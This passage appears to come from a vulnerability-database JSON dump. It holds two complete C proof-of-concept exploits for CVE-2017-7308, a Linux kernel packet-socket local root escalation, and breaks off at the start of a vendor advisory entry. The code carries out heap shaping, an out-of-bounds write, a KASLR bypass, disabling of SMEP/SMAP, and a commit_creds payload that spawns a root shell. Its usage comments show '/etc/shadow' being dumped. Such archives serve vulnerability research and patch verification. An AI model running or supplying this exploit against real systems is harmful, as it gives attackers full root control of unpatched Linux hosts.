0) {\n dprintf(\"[-] uname())\\n\");\n exit(EXIT_FAILURE);\n }\n assert(strlen(u.release) <= max_length);\n strcpy(&output[0], u.release);\n}\n\n#define ARRAY_SIZE(x) (sizeof(x) / sizeof((x)[0]))\n\n#define KERNEL_VERSION_LENGTH 32\n\nvoid detect_versions() {\n\tchar version[KERNEL_VERSION_LENGTH];\n\n\tget_kernel_version(&version[0], KERNEL_VERSION_LENGTH);\n\n\tint i;\n\tfor (i = 0; i < ARRAY_SIZE(kernels); i++) {\n\t\tif (strcmp(&version[0], kernels[i].version) == 0) {\n\t\t\tdprintf(\"[.] kernel version '%s' detected\\n\", kernels[i].version);\n\t\t\tkernel = i;\n\t\t\treturn;\n\t\t}\n\t}\n\n\tdprintf(\"[-] kernel version not recognized\\n\");\n\texit(EXIT_FAILURE);\n}\n\n#define PROC_CPUINFO_LENGTH 4096\n\n// 0 - nothing, 1 - SMEP, 2 - SMAP, 3 - SMEP & SMAP\nint smap_smep_enabled() {\n\tchar buffer[PROC_CPUINFO_LENGTH];\n\tchar* path = \"/proc/cpuinfo\";\n\tint length = read_file(path, &buffer[0], PROC_CPUINFO_LENGTH);\n\tif (length == -1) {\n\t\tdprintf(\"[-] open/read(%s)\\n\", path);\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tint rv = 0;\n\tchar* found = memmem(&buffer[0], length, \"smep\", 4);\n\tif (found != NULL)\n\t\trv += 1;\n\tfound = memmem(&buffer[0], length, \"smap\", 4);\n\tif (found != NULL)\n\t\trv += 2;\n\treturn rv;\n}\n\nvoid check_smep_smap() {\n\tint rv = smap_smep_enabled();\n\n#if !ENABLE_SMEP_SMAP_BYPASS\n\tif (rv >= 1) {\n\t\tdprintf(\"[-] SMAP/SMEP detected, use ENABLE_SMEP_SMAP_BYPASS\\n\");\n\t\texit(EXIT_FAILURE);\n\t}\n#endif\n\n\tswitch(rv) {\n\tcase 1: // SMEP\n\t\tCR4_DESIRED_VALUE = 0x406e0ul;\n\t\tbreak;\n\tcase 2: // SMAP\n\t\tCR4_DESIRED_VALUE = 0x407f0ul;\n\t\tbreak;\n\tcase 3: // SMEP and SMAP\n\t\tCR4_DESIRED_VALUE = 0x407f0ul;\n\t\tbreak;\n\t}\n}\n\n// * * * * * * * * * * * * * Syslog KASLR bypass * * * * * * * * * * * * * * *\n\n#define SYSLOG_ACTION_READ_ALL 3\n#define SYSLOG_ACTION_SIZE_BUFFER 10\n\nunsigned long get_kernel_addr_syslog() {\n\tdprintf(\"[.] trying syslog...\\n\");\n\n\tint size = klogctl(SYSLOG_ACTION_SIZE_BUFFER, 0, 0);\n\tif (size == -1) {\n\t\tdprintf(\"[-] klogctl(SYSLOG_ACTION_SIZE_BUFFER)\\n\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tsize = (size / getpagesize() + 1) * getpagesize();\n\tchar *buffer = (char *)mmap(NULL, size, PROT_READ|PROT_WRITE,\n\t\tMAP_PRIVATE|MAP_ANONYMOUS, -1, 0);\n\n\tsize = klogctl(SYSLOG_ACTION_READ_ALL, &buffer[0], size);\n\tif (size == -1) {\n\t\tdprintf(\"[-] klogctl(SYSLOG_ACTION_READ_ALL)\\n\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tconst char *needle1 = \"Freeing SMP\";\n\tchar *substr = (char *)memmem(&buffer[0], size, needle1, strlen(needle1));\n\tif (substr == NULL) {\n\t\tdprintf(\"[-] substring '%s' not found in dmesg\\n\", needle1);\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tfor (size = 0; substr[size] != '\\n'; size++);\n\n\tconst char *needle2 = \"ffff\";\n\tsubstr = (char *)memmem(&substr[0], size, needle2, strlen(needle2));\n\tif (substr == NULL) {\n\t\tdprintf(\"[-] substring '%s' not found in dmesg\\n\", needle2);\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tchar *endptr = &substr[16];\n\tunsigned long r = strtoul(&substr[0], &endptr, 16);\n\n\tr &= 0xfffffffffff00000ul;\n\tr -= 0x1000000ul;\n\n\treturn r;\n}\n\n// * * * * * * * * * * * * * * kallsyms KASLR bypass * * * * * * * * * * * * * *\n\nunsigned long get_kernel_addr_kallsyms() {\n\tFILE *f;\n\tunsigned long addr = 0;\n\tchar dummy;\n\tchar sname[256];\n\tchar* name = \"startup_64\";\n\tchar* path = \"/proc/kallsyms\";\n\n\tdprintf(\"[.] trying %s...\\n\", path);\n\tf = fopen(path, \"r\");\n\tif (f == NULL) {\n\t\tdprintf(\"[-] open/read(%s)\\n\", path);\n\t\treturn 0;\n\t}\n\n\tint ret = 0;\n\twhile (ret != EOF) {\n\t\tret = fscanf(f, \"%p %c %s\\n\", (void **)&addr, &dummy, sname);\n\t\tif (ret == 0) {\n\t\t\tfscanf(f, \"%s\\n\", sname);\n\t\t\tcontinue;\n\t\t}\n\t\tif (!strcmp(name, sname)) {\n\t\t\tfclose(f);\n\t\t\treturn addr;\n\t\t}\n\t}\n\n\tfclose(f);\n\tdprintf(\"[-] kernel base not found in %s\\n\", path);\n\treturn 0;\n}\n\n// * * * * * * * * * * * * * * System.map KASLR bypass * * * * * * * * * * * * * *\n\nunsigned long get_kernel_addr_sysmap() {\n\tFILE *f;\n\tunsigned long addr = 0;\n\tchar path[512] = \"/boot/System.map-\";\n\tchar version[32];\n\tget_kernel_version(&version[0], 32);\n\tstrcat(path, &version[0]);\n\tdprintf(\"[.] trying %s...\\n\", path);\n\tf = fopen(path, \"r\");\n\tif (f == NULL) {\n\t\tdprintf(\"[-] open/read(%s)\\n\", path);\n\t\treturn 0;\n\t}\n\n\tchar dummy;\n\tchar sname[256];\n\tchar* name = \"startup_64\";\n\tint ret = 0;\n\twhile (ret != EOF) {\n\t\tret = fscanf(f, \"%p %c %s\\n\", (void **)&addr, &dummy, sname);\n\t\tif (ret == 0) {\n\t\t\tfscanf(f, \"%s\\n\", sname);\n\t\t\tcontinue;\n\t\t}\n\t\tif (!strcmp(name, sname)) {\n\t\t\tfclose(f);\n\t\t\treturn addr;\n\t\t}\n\t}\n\n\tfclose(f);\n\tdprintf(\"[-] kernel base not found in %s\\n\", path);\n\treturn 0;\n}\n\n// * * * * * * * * * * * * * * KASLR bypasses * * * * * * * * * * * * * * * *\n\nunsigned long get_kernel_addr() {\n\tunsigned long addr = 0;\n\n\taddr = get_kernel_addr_kallsyms();\n if (addr) return addr;\n\n\taddr = get_kernel_addr_sysmap();\n\tif (addr) return addr;\n\n\taddr = get_kernel_addr_syslog();\n\tif (addr) return addr;\n\n\tdprintf(\"[-] KASLR bypass failed\\n\");\n\texit(EXIT_FAILURE);\n\n\treturn 0;\n}\n\n// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * * *\n\nvoid check_procs() {\n\tint min_procs = 2;\n\n\tint nprocs = 0;\n\tnprocs = get_nprocs_conf();\n\n\tif (nprocs < min_procs) {\n\t\tdprintf(\"[-] system has less than %d processor cores\\n\", min_procs);\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tdprintf(\"[.] system has %d processors\\n\", nprocs);\n}\n\nvoid exec_shell() {\n\tint fd;\n\n\tfd = open(\"/proc/1/ns/net\", O_RDONLY);\n\tif (fd == -1) {\n\t\tdprintf(\"error opening /proc/1/ns/net\\n\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tif (setns(fd, CLONE_NEWNET) == -1) {\n\t\tdprintf(\"error calling setns\\n\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tsystem(SHELL);\n}\n\nvoid fork_shell() {\n\tpid_t rv;\n\n\trv = fork();\n\tif (rv == -1) {\n\t\tdprintf(\"[-] fork()\\n\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tif (rv == 0) {\n\t\texec_shell();\n\t}\n}\n\nbool is_root() {\n\t// We can't simple check uid, since we're running inside a namespace\n\t// with uid set to 0. Try opening /etc/shadow instead.\n\tint fd = open(\"/etc/shadow\", O_RDONLY);\n\tif (fd == -1)\n\t\treturn false;\n\tclose(fd);\n\treturn true;\n}\n\nvoid check_root() {\n\tdprintf(\"[.] checking if we got root\\n\");\n\n\tif (!is_root()) {\n\t\tdprintf(\"[-] something went wrong =(\\n\");\n\t\treturn;\n\t}\n\n\tdprintf(\"[+] got r00t ^_^\\n\");\n\n\t// Fork and exec instead of just doing the exec to avoid potential\n\t// memory corruptions when closing packet sockets.\n\tfork_shell();\n}\n\nbool write_file(const char* file, const char* what, ...) {\n\tchar buf[1024];\n\tva_list args;\n\tva_start(args, what);\n\tvsnprintf(buf, sizeof(buf), what, args);\n\tva_end(args);\n\tbuf[sizeof(buf) - 1] = 0;\n\tint len = strlen(buf);\n\n\tint fd = open(file, O_WRONLY | O_CLOEXEC);\n\tif (fd == -1)\n\t\treturn false;\n\tif (write(fd, buf, len) != len) {\n\t\tclose(fd);\n\t\treturn false;\n\t}\n\tclose(fd);\n\treturn true;\n}\n\nvoid setup_sandbox() {\n\tint real_uid = getuid();\n\tint real_gid = getgid();\n\n if (unshare(CLONE_NEWUSER) != 0) {\n\t\tdprintf(\"[-] unshare(CLONE_NEWUSER)\\n\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n if (unshare(CLONE_NEWNET) != 0) {\n\t\tdprintf(\"[-] unshare(CLONE_NEWUSER)\\n\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tif (!write_file(\"/proc/self/setgroups\", \"deny\")) {\n\t\tdprintf(\"[-] write_file(/proc/self/set_groups)\\n\");\n\t\texit(EXIT_FAILURE);\n\t}\n\tif (!write_file(\"/proc/self/uid_map\", \"0 %d 1\\n\", real_uid)){\n\t\tdprintf(\"[-] write_file(/proc/self/uid_map)\\n\");\n\t\texit(EXIT_FAILURE);\n\t}\n\tif (!write_file(\"/proc/self/gid_map\", \"0 %d 1\\n\", real_gid)) {\n\t\tdprintf(\"[-] write_file(/proc/self/gid_map)\\n\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tcpu_set_t my_set;\n\tCPU_ZERO(&my_set);\n\tCPU_SET(0, &my_set);\n\tif (sched_setaffinity(0, sizeof(my_set), &my_set) != 0) {\n\t\tdprintf(\"[-] sched_setaffinity()\\n\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tif (system(\"/sbin/ifconfig lo up\") != 0) {\n\t\tdprintf(\"[-] system(/sbin/ifconfig lo up)\\n\");\n\t\texit(EXIT_FAILURE);\n\t}\n}\n\nint main(int argc, char *argv[]) {\n\tif (argc > 1) SHELL = argv[1];\n\n\tdprintf(\"[.] starting\\n\");\n\n\tcheck_procs();\n\n\tdprintf(\"[.] checking kernel version\\n\");\n\tdetect_versions();\n\tdprintf(\"[~] done, version looks good\\n\");\n\n\tdprintf(\"[.] checking SMEP and SMAP\\n\");\n\tcheck_smep_smap();\n\tdprintf(\"[~] done, looks good\\n\");\n\n\tdprintf(\"[.] setting up namespace sandbox\\n\");\n\tsetup_sandbox();\n\tdprintf(\"[~] done, namespace sandbox set up\\n\");\n\n#if ENABLE_KASLR_BYPASS\n\tdprintf(\"[.] KASLR bypass enabled, getting kernel addr\\n\");\n\tKERNEL_BASE = get_kernel_addr();\n\tdprintf(\"[.] done, kernel text: %lx\\n\", KERNEL_BASE);\n#endif\n\n\tdprintf(\"[.] commit_creds: %lx\\n\", COMMIT_CREDS);\n\tdprintf(\"[.] prepare_kernel_cred: %lx\\n\", PREPARE_KERNEL_CRED);\n\n#if ENABLE_SMEP_SMAP_BYPASS\n\tdprintf(\"[.] native_write_cr4: %lx\\n\", NATIVE_WRITE_CR4);\n#endif\n\n\tdprintf(\"[.] padding heap\\n\");\n\tkmalloc_pad(KMALLOC_PAD);\n\tpagealloc_pad(PAGEALLOC_PAD);\n\tdprintf(\"[.] done, heap is padded\\n\");\n\n#if ENABLE_SMEP_SMAP_BYPASS\n\tdprintf(\"[.] SMEP & SMAP bypass enabled, turning them off\\n\");\n\toob_timer_execute((void *)(NATIVE_WRITE_CR4), CR4_DESIRED_VALUE);\n\tdprintf(\"[.] done, SMEP & SMAP should be off now\\n\");\n#endif\n\n\tdprintf(\"[.] executing get root payload %p\\n\", &get_root_payload);\n\toob_id_match_execute((void *)&get_root_payload);\n\tdprintf(\"[.] done, should be root now\\n\");\n\n\tcheck_root();\n\n\twhile (1) sleep(1000);\n\n\treturn 0;\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:29", "description": "\nLinux Kernel 4.8.0-41-generic (Ubuntu) - Packet Socket Local Privilege Escalation", "edition": 1, "published": "2017-05-11T00:00:00", "title": "Linux Kernel 4.8.0-41-generic (Ubuntu) - Packet Socket Local Privilege Escalation", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7308"], "modified": "2017-05-11T00:00:00", "id": "EXPLOITPACK:4CB8F52029A7ED20CD5AD83DA63EF19E", "href": "", "sourceData": "// A proof-of-concept local root exploit for CVE-2017-7308.\n// Includes a SMEP & SMAP bypass.\n// Tested on 4.8.0-41-generic Ubuntu kernel.\n// https://github.com/xairy/kernel-exploits/tree/master/CVE-2017-7308\n//\n// Usage:\n// user@ubuntu:~$ uname -a\n// Linux ubuntu 4.8.0-41-generic #44~16.04.1-Ubuntu SMP Fri Mar 3 ...\n// user@ubuntu:~$ gcc pwn.c -o pwn\n// user@ubuntu:~$ ./pwn \n// [.] starting\n// [.] namespace sandbox set up\n// [.] KASLR bypass enabled, getting kernel addr\n// [.] done, kernel text: ffffffff87000000\n// [.] commit_creds: ffffffff870a5cf0\n// [.] prepare_kernel_cred: ffffffff870a60e0\n// [.] native_write_cr4: ffffffff87064210\n// [.] padding heap\n// [.] done, heap is padded\n// [.] SMEP & SMAP bypass enabled, turning them off\n// [.] done, SMEP & SMAP should be off now\n// [.] executing get root payload 0x401516\n// [.] done, should be root now\n// [.] checking if we got root\n// [+] got r00t ^_^\n// root@ubuntu:/home/user# cat /etc/shadow\n// root:!:17246:0:99999:7:::\n// daemon:*:17212:0:99999:7:::\n// bin:*:17212:0:99999:7:::\n// ...\n//\n// Andrey Konovalov <andreyknvl@gmail.com>\n\n#define _GNU_SOURCE\n\n#include <errno.h>\n#include <fcntl.h>\n#include <stdarg.h>\n#include <stdbool.h>\n#include <stddef.h>\n#include <stdint.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <unistd.h>\n#include <sched.h>\n\n#include <sys/ioctl.h>\n#include <sys/klog.h>\n#include <sys/mman.h>\n#include <sys/socket.h>\n#include <sys/syscall.h>\n#include <sys/types.h>\n#include <sys/wait.h>\n\n#include <arpa/inet.h>\n#include <linux/if_packet.h>\n#include <linux/ip.h>\n#include <linux/udp.h>\n#include <netinet/if_ether.h>\n#include <net/if.h>\n\n#define ENABLE_KASLR_BYPASS\t1\n#define ENABLE_SMEP_SMAP_BYPASS\t1\n\n// Will be overwritten if ENABLE_KASLR_BYPASS\nunsigned long KERNEL_BASE = \t0xffffffff81000000ul;\n\n// Kernel symbol offsets\n#define COMMIT_CREDS\t\t0xa5cf0ul\n#define PREPARE_KERNEL_CRED\t0xa60e0ul\n#define NATIVE_WRITE_CR4\t0x64210ul\n\n// Should have SMEP and SMAP bits disabled\n#define CR4_DESIRED_VALUE\t0x407f0ul\n\n#define KMALLOC_PAD\t\t512\n#define PAGEALLOC_PAD\t\t1024\n\n// * * * * * * * * * * * * * * Kernel structs * * * * * * * * * * * * * * * *\n\ntypedef uint32_t u32;\n\n// $ pahole -C hlist_node ./vmlinux\nstruct hlist_node {\n\tstruct hlist_node * next; /* 0 8 */\n\tstruct hlist_node * * pprev; /* 8 8 */\n};\n\n// $ pahole -C timer_list ./vmlinux\nstruct timer_list {\n\tstruct hlist_node entry; /* 0 16 */\n\tlong unsigned int expires; /* 16 8 */\n\tvoid (*function)(long unsigned int); /* 24 8 */\n\tlong unsigned int data; /* 32 8 */\n\tu32 flags; /* 40 4 */\n\tint start_pid; /* 44 4 */\n\tvoid * start_site; /* 48 8 */\n\tchar start_comm[16]; /* 56 16 */\n};\n\n// packet_sock->rx_ring->prb_bdqc->retire_blk_timer\n#define TIMER_OFFSET\t896\n\n// pakcet_sock->xmit\n#define XMIT_OFFSET\t1304\n\n// * * * * * * * * * * * * * * * Helpers * * * * * * * * * * * * * * * * * *\n\nvoid packet_socket_rx_ring_init(int s, unsigned int block_size,\n\t\tunsigned int frame_size, unsigned int block_nr,\n\t\tunsigned int sizeof_priv, unsigned int timeout) {\n\tint v = TPACKET_V3;\n\tint rv = setsockopt(s, SOL_PACKET, PACKET_VERSION, &v, sizeof(v));\n\tif (rv < 0) {\n\t\tperror(\"[-] setsockopt(PACKET_VERSION)\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tstruct tpacket_req3 req;\n\tmemset(&req, 0, sizeof(req));\n\treq.tp_block_size = block_size;\n\treq.tp_frame_size = frame_size;\n\treq.tp_block_nr = block_nr;\n\treq.tp_frame_nr = (block_size * block_nr) / frame_size;\n\treq.tp_retire_blk_tov = timeout;\n\treq.tp_sizeof_priv = sizeof_priv;\n\treq.tp_feature_req_word = 0;\n\n\trv = setsockopt(s, SOL_PACKET, PACKET_RX_RING, &req, sizeof(req));\n\tif (rv < 0) {\n\t\tperror(\"[-] setsockopt(PACKET_RX_RING)\");\n\t\texit(EXIT_FAILURE);\n\t}\n}\n\nint packet_socket_setup(unsigned int block_size, unsigned int frame_size,\n\t\tunsigned int block_nr, unsigned int sizeof_priv, int timeout) {\n\tint s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));\n\tif (s < 0) {\n\t\tperror(\"[-] socket(AF_PACKET)\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tpacket_socket_rx_ring_init(s, block_size, frame_size, block_nr,\n\t\tsizeof_priv, timeout);\n\n\tstruct sockaddr_ll sa;\n\tmemset(&sa, 0, sizeof(sa));\n\tsa.sll_family = PF_PACKET;\n\tsa.sll_protocol = htons(ETH_P_ALL);\n\tsa.sll_ifindex = if_nametoindex(\"lo\");\n\tsa.sll_hatype = 0;\n\tsa.sll_pkttype = 0;\n\tsa.sll_halen = 0;\n\n\tint rv = bind(s, (struct sockaddr *)&sa, sizeof(sa));\n\tif (rv < 0) {\n\t\tperror(\"[-] bind(AF_PACKET)\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\treturn s;\n}\n\nvoid packet_socket_send(int s, char *buffer, int size) {\n\tstruct sockaddr_ll sa;\n\tmemset(&sa, 0, sizeof(sa));\n\tsa.sll_ifindex = if_nametoindex(\"lo\");\n\tsa.sll_halen = ETH_ALEN;\n\n\tif (sendto(s, buffer, size, 0, (struct sockaddr *)&sa,\n\t\t\tsizeof(sa)) < 0) {\n\t\tperror(\"[-] sendto(SOCK_RAW)\");\n\t\texit(EXIT_FAILURE);\n\t}\n}\n\nvoid loopback_send(char *buffer, int size) {\n\tint s = socket(AF_PACKET, SOCK_RAW, IPPROTO_RAW);\n\tif (s == -1) {\n\t\tperror(\"[-] socket(SOCK_RAW)\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tpacket_socket_send(s, buffer, size);\n}\n\nint packet_sock_kmalloc() {\n\tint s = socket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_ARP));\n\tif (s == -1) {\n\t\tperror(\"[-] socket(SOCK_DGRAM)\");\n\t\texit(EXIT_FAILURE);\n\t}\n\treturn s;\n}\n\nvoid packet_sock_timer_schedule(int s, int timeout) {\n\tpacket_socket_rx_ring_init(s, 0x1000, 0x1000, 1, 0, timeout);\n}\n\nvoid packet_sock_id_match_trigger(int s) {\n\tchar buffer[16];\n\tpacket_socket_send(s, &buffer[0], sizeof(buffer));\n}\n\n// * * * * * * * * * * * * * * * Trigger * * * * * * * * * * * * * * * * * *\n\n#define ALIGN(x, a)\t\t\t__ALIGN_KERNEL((x), (a))\n#define __ALIGN_KERNEL(x, a)\t\t__ALIGN_KERNEL_MASK(x, (typeof(x))(a) - 1)\n#define __ALIGN_KERNEL_MASK(x, mask)\t(((x) + (mask)) & ~(mask))\n\n#define V3_ALIGNMENT\t(8)\n#define BLK_HDR_LEN\t(ALIGN(sizeof(struct tpacket_block_desc), V3_ALIGNMENT))\n\n#define ETH_HDR_LEN\tsizeof(struct ethhdr)\n#define IP_HDR_LEN\tsizeof(struct iphdr)\n#define UDP_HDR_LEN\tsizeof(struct udphdr)\n\n#define UDP_HDR_LEN_FULL\t(ETH_HDR_LEN + IP_HDR_LEN + UDP_HDR_LEN)\n\nint oob_setup(int offset) {\n\tunsigned int maclen = ETH_HDR_LEN;\n\tunsigned int netoff = TPACKET_ALIGN(TPACKET3_HDRLEN +\n\t\t\t\t(maclen < 16 ? 16 : maclen));\n\tunsigned int macoff = netoff - maclen;\n\tunsigned int sizeof_priv = (1u<<31) + (1u<<30) +\n\t\t0x8000 - BLK_HDR_LEN - macoff + offset;\n\treturn packet_socket_setup(0x8000, 2048, 2, sizeof_priv, 100);\n}\n\nvoid oob_write(char *buffer, int size) {\n\tloopback_send(buffer, size);\n}\n\nvoid oob_timer_execute(void *func, unsigned long arg) {\n\toob_setup(2048 + TIMER_OFFSET - 8);\n\n\tint i;\n\tfor (i = 0; i < 32; i++) {\n\t\tint timer = packet_sock_kmalloc();\n\t\tpacket_sock_timer_schedule(timer, 1000);\n\t}\n\n\tchar buffer[2048];\n\tmemset(&buffer[0], 0, sizeof(buffer));\n\n\tstruct timer_list *timer = (struct timer_list *)&buffer[8];\n\ttimer->function = func;\n\ttimer->data = arg;\n\ttimer->flags = 1;\n\n\toob_write(&buffer[0] + 2, sizeof(*timer) + 8 - 2);\n\n\tsleep(1);\n}\n\nvoid oob_id_match_execute(void *func) {\n\tint s = oob_setup(2048 + XMIT_OFFSET - 64);\n\n\tint ps[32];\n\n\tint i;\n\tfor (i = 0; i < 32; i++)\n\t\tps[i] = packet_sock_kmalloc();\n\n\tchar buffer[2048];\n\tmemset(&buffer[0], 0, 2048);\n\n\tvoid **xmit = (void **)&buffer[64];\n\t*xmit = func;\n\n\toob_write((char *)&buffer[0] + 2, sizeof(*xmit) + 64 - 2);\n\n\tfor (i = 0; i < 32; i++)\n\t\tpacket_sock_id_match_trigger(ps[i]);\n}\n\n// * * * * * * * * * * * * * * Heap shaping * * * * * * * * * * * * * * * * *\n\nvoid kmalloc_pad(int count) {\n\tint i;\n\tfor (i = 0; i < count; i++)\n\t\tpacket_sock_kmalloc();\n}\n\nvoid pagealloc_pad(int count) {\n\tpacket_socket_setup(0x8000, 2048, count, 0, 100);\n}\n\n// * * * * * * * * * * * * * * * Getting root * * * * * * * * * * * * * * * *\n\ntypedef unsigned long __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\ntypedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);\n\nvoid get_root_payload(void) {\n\t((_commit_creds)(KERNEL_BASE + COMMIT_CREDS))(\n\t\t((_prepare_kernel_cred)(KERNEL_BASE + PREPARE_KERNEL_CRED))(0)\n\t);\n}\n\n// * * * * * * * * * * * * * Simple KASLR bypass * * * * * * * * * * * * * * *\n\n#define SYSLOG_ACTION_READ_ALL 3\n#define SYSLOG_ACTION_SIZE_BUFFER 10\n\nunsigned long get_kernel_addr() {\n\tint size = klogctl(SYSLOG_ACTION_SIZE_BUFFER, 0, 0);\n\tif (size == -1) {\n\t\tperror(\"[-] klogctl(SYSLOG_ACTION_SIZE_BUFFER)\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tsize = (size / getpagesize() + 1) * getpagesize();\n\tchar *buffer = (char *)mmap(NULL, size, PROT_READ|PROT_WRITE,\n\t\tMAP_PRIVATE|MAP_ANONYMOUS, -1, 0);\n\n\tsize = klogctl(SYSLOG_ACTION_READ_ALL, &buffer[0], size);\n\tif (size == -1) {\n\t\tperror(\"[-] klogctl(SYSLOG_ACTION_READ_ALL)\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tconst char *needle1 = \"Freeing SMP\";\n\tchar *substr = (char *)memmem(&buffer[0], size, needle1, strlen(needle1));\n\tif (substr == NULL) {\n\t\tfprintf(stderr, \"[-] substring '%s' not found in dmesg\\n\", needle1);\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tfor (size = 0; substr[size] != '\\n'; size++);\n\n\tconst char *needle2 = \"ffff\";\n\tsubstr = (char *)memmem(&substr[0], size, needle2, strlen(needle2));\n\tif (substr == NULL) {\n\t\tfprintf(stderr, \"[-] substring '%s' not found in dmesg\\n\", needle2);\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tchar *endptr = &substr[16];\n\tunsigned long r = strtoul(&substr[0], &endptr, 16);\n\n\tr &= 0xfffffffffff00000ul;\n\tr -= 0x1000000ul;\n\n\treturn r;\n}\n\n// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * * *\n\nvoid exec_shell() {\n\tchar *shell = \"/bin/bash\";\n\tchar *args[] = {shell, \"-i\", NULL};\n\texecve(shell, args, NULL);\n}\n\nvoid fork_shell() {\n\tpid_t rv;\n\n\trv = fork();\n\tif (rv == -1) {\n\t\tperror(\"[-] fork()\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tif (rv == 0) {\n\t\texec_shell();\n\t}\n}\n\nbool is_root() {\n\t// We can't simple check uid, since we're running inside a namespace\n\t// with uid set to 0. Try opening /etc/shadow instead.\n\tint fd = open(\"/etc/shadow\", O_RDONLY);\n\tif (fd == -1)\n\t\treturn false;\n\tclose(fd);\n\treturn true;\n}\n\nvoid check_root() {\n\tprintf(\"[.] checking if we got root\\n\");\n\n\tif (!is_root()) {\n\t\tprintf(\"[-] something went wrong =(\\n\");\n\t\treturn;\n\t}\n\n\tprintf(\"[+] got r00t ^_^\\n\");\n\n\t// Fork and exec instead of just doing the exec to avoid potential\n\t// memory corruptions when closing packet sockets.\n\tfork_shell();\n}\n\nbool write_file(const char* file, const char* what, ...) {\n\tchar buf[1024];\n\tva_list args;\n\tva_start(args, what);\n\tvsnprintf(buf, sizeof(buf), what, args);\n\tva_end(args);\n\tbuf[sizeof(buf) - 1] = 0;\n\tint len = strlen(buf);\n\n\tint fd = open(file, O_WRONLY | O_CLOEXEC);\n\tif (fd == -1)\n\t\treturn false;\n\tif (write(fd, buf, len) != len) {\n\t\tclose(fd);\n\t\treturn false;\n\t}\n\tclose(fd);\n\treturn true;\n}\n\nvoid setup_sandbox() {\n\tint real_uid = getuid();\n\tint real_gid = getgid();\n\n if (unshare(CLONE_NEWUSER) != 0) {\n\t\tperror(\"[-] unshare(CLONE_NEWUSER)\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n if (unshare(CLONE_NEWNET) != 0) {\n\t\tperror(\"[-] unshare(CLONE_NEWUSER)\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tif (!write_file(\"/proc/self/setgroups\", \"deny\")) {\n\t\tperror(\"[-] write_file(/proc/self/set_groups)\");\n\t\texit(EXIT_FAILURE);\n\t}\n\tif (!write_file(\"/proc/self/uid_map\", \"0 %d 1\\n\", real_uid)){\n\t\tperror(\"[-] write_file(/proc/self/uid_map)\");\n\t\texit(EXIT_FAILURE);\n\t}\n\tif (!write_file(\"/proc/self/gid_map\", \"0 %d 1\\n\", real_gid)) {\n\t\tperror(\"[-] write_file(/proc/self/gid_map)\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tcpu_set_t my_set;\n\tCPU_ZERO(&my_set);\n\tCPU_SET(0, &my_set);\n\tif (sched_setaffinity(0, sizeof(my_set), &my_set) != 0) {\n\t\tperror(\"[-] sched_setaffinity()\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tif (system(\"/sbin/ifconfig lo up\") != 0) {\n\t\tperror(\"[-] system(/sbin/ifconfig lo up)\");\n\t\texit(EXIT_FAILURE);\n\t}\n}\n\nint main() {\n\tprintf(\"[.] starting\\n\");\n\n\tsetup_sandbox();\n\n\tprintf(\"[.] namespace sandbox set up\\n\");\n\n#if ENABLE_KASLR_BYPASS\n\tprintf(\"[.] KASLR bypass enabled, getting kernel addr\\n\");\n\tKERNEL_BASE = get_kernel_addr();\n\tprintf(\"[.] done, kernel text: %lx\\n\", KERNEL_BASE);\n#endif\n\n\tprintf(\"[.] commit_creds: %lx\\n\", KERNEL_BASE + COMMIT_CREDS);\n\tprintf(\"[.] prepare_kernel_cred: %lx\\n\", KERNEL_BASE + PREPARE_KERNEL_CRED);\n\n#if ENABLE_SMEP_SMAP_BYPASS\n\tprintf(\"[.] native_write_cr4: %lx\\n\", KERNEL_BASE + NATIVE_WRITE_CR4);\n#endif\n\n\tprintf(\"[.] padding heap\\n\");\n\tkmalloc_pad(KMALLOC_PAD);\n\tpagealloc_pad(PAGEALLOC_PAD);\n\tprintf(\"[.] done, heap is padded\\n\");\n\n#if ENABLE_SMEP_SMAP_BYPASS\n\tprintf(\"[.] SMEP & SMAP bypass enabled, turning them off\\n\");\n\toob_timer_execute((void *)(KERNEL_BASE + NATIVE_WRITE_CR4), CR4_DESIRED_VALUE);\n\tprintf(\"[.] done, SMEP & SMAP should be off now\\n\");\n#endif\n\n\tprintf(\"[.] executing get root payload %p\\n\", &get_root_payload);\n\toob_id_match_execute((void *)&get_root_payload);\n\tprintf(\"[.] done, should be root now\\n\");\n\n\tcheck_root();\n\n\twhile (1) sleep(1000);\n\n\treturn 0;\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cloudfoundry": [{"lastseen": "2019-05-29T18:32:57", "bulletinFamily": "software", "cvelist": ["CVE-2017-7308"], "description": "# \n\n# Severity\n\nHigh\n\n# Vendor\n\nCanonical Ubuntu\n\n# Versions Affected\n\n * Canonical Ubuntu 14.04\n\n# 